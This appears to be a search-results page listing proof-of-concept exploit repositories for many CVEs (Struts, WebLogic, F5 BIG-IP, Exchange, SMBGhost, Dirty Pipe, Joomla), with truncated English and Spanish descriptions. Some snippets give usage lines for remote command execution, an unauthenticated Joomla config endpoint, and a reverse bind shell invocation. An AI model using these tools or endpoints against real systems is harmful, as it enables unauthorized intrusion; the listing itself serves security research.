12899 matches found
CVE-2025-9074-PoC-Bash
CVE-2025-9074-PoC-Bash The original PoC is: https://github.com/j3r1ch0123/CVE-2025-9074. This is new PoC in bash since not all docker containers has python installed, and mostly this should be run from inside a container. Steps From inside the container use the following to find vulnerable docker...
CVE-2022-1388_refresh
CVE-2022-1388 - refresh PoC para explotar CVE-2022-1388 en BigIP F5 Uso del Exploit root@kitploit: python3 refresh.py -h usage: refresh.py -h -u URL -f F -c CMD -s SH optional arguments: -h, --help show this help message and exit -u URL, --url URL target url -f F, --file F url file -c CMD,...
CVE-2021-38295-PoC
CVE-2021-38295-PoC Una prueba de concepto simple en Python para CVE-2021-38295. Entrada de blog relacionada ENLACE AL BLOG Uso: root@kitploit: Usage: cve-xxxx Simplemente proporciona al script un host, una base de datos a la que tus credenciales tengan acceso, y el par de usuario y contraseña. Si...
cve-2017-5638
CVE-2017-5638 Código PoC en Python | DORK: ext:action Código PoC de ejemplo para CVE-2017-5638 | Exploit de Apache Struts | DORK: ext:action USO: python struts.py https://victim.site dir El script Python inicial que se publicó no formateaba correctamente el encabezado Content-Type. Recodifiqué el...
CVE-2017-10271
CVE-2017-10271 CVE-2017-10271 PoC de verificación de vulnerabilidad de Weblogic Useage: python weblogic.py -u 'http://...:7001/wls-wsat/CoordinatorPortType' -c 'touch /tmp/test' Descargar parche aquí...
CVE-2023-27350-POC
CVE-2023-27350-POC A python script tht searches for vulnerable version of PaperCut MF/NG More information can be found here: https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software Note: This was created for educational use only. Use at your own risk...
CVE-2025-55182
CVE-2025-55182 React2Shell Exploit PoC ⚠️ WARNING: This project intentionally uses vulnerable software for security research purposes only. Credits All credits for the PoC go to @maple3142 Setup & Running Docker root@kitploit: docker-compose up --build The app will be available at...
Dirtypipe-exploit
Dirtypipe-exploit Dirty Pipe CVE-2022-0847 PoC that hijacks a SUID binary to spawn. a root shell. and attempts to restore the damaged binary as well...
CVE-2019-2729_creal
CVE-2019-2729 - creal Prueba de concepto para explotar CVE-2019-2729 en WebLogic Uso del Exploit root@kitploit: python3 creal.py -h usage: creal.py -h -u URL -f F -c CMD -s SH optional arguments: -h, --help show this help message and exit -u URL, --url URL target url -f F, --file F url file -c CM...
CVE-2022-RCE
CVE-2022-XXXX Inyección de datos basura inversa Suscripción CVE Herramientas Explotación Tutorial Exploit POC RCE LOG4j Deserialización JNDI Payload CVE-2022-20550 CVE-2022-20551 CVE-2022-20552 CVE-2022-20553 CVE-2022-20554 CVE-2022-20555 CVE-2022-20556 CVE-2022-20557 CVE-2022-20558 CVE-2022-2055...
CVE-2023-23752
CVE-2023-23752 Joomla! Vulnerabilidad de acceso no autorizado POC: /api/index.php/v1/config/application?public=true Análisis de la vulnerabilidad https://xz.aliyun.com/t/12175...
php-8.1.0-dev-exploit
php-8.1-dev-Exploit ⚠️ Importante leer primero Este repositorio contiene una prueba de concepto PoC en Java destinada únicamente para uso en CTF / laboratorio. No ejecute este código contra sistemas que no posea o para los que no tenga un permiso por escrito explícito para probar. La explotación n...
CVE-2026-9999-exploit
CVE-2026-9999 — Chrome ANGLE/Metal WebGL PoC Hunting Harness macOS 1. Vulnerability summary...
reapoc
reapoc Almacén de código abierto de PoCs y objetivos vulnerables. Nuestro objetivo es recopilar diferentes PoCs normalizados y los objetivos vulnerables para verificarlos. Actualmente reapoc soporta estos PoCs: pocsploit: Mi nuevo framework de PoCs simple e inteligente, ¡bienvenido! nuclei: Famos...
CVE-2023-36745
CVE-2023-36745 Microsoft Exchange Server CVE-2023-36745 RCE PoC. Example: root@kitploit: python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \192.168.237.131\Shares\ -c calc.exe Command will be passed to powershell -e...
CVE-2020-0796-PoC
CVE-2020-0796-PoC ¡ganadores! Daniel García Gutiérrez @danigargu Manuel Blanco Parajón @dialluvioso Ver aquí: https://github.com/danigargu/CVE-2020-0796...
CVE-2016-10033
WordPress 4.6 - Remote Code Execution RCE PoC Exploit CVE-2016-10033 It is modified version of Dawid Golunski's exploit 41962...
CVE-2022-21661-PoC
CVE-2022-21661-PoC Un PoC en Python para CVE-2022-21661, inspirado en el PoC en Go de z92g Instalación root@kitploit: pip3 install -r requirements.txt Uso root@kitploit: usage: main.py -h -u URL -f FILE Identify CEV-2022-21661 in Wordpress instances. options: -h, --help show this help message and...
CVE-2022-21500
Badges License MIT Installation...
CVE-2020-0796
CVE-2020-0796 PoC de Exploit Funcionando CVE-2020-0796 - Reverse Bind Shell Probado usando Python2.7 Para Instalar: pip install -r requirements.txt Para Ejecutar: python CVE-2020-0796-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444...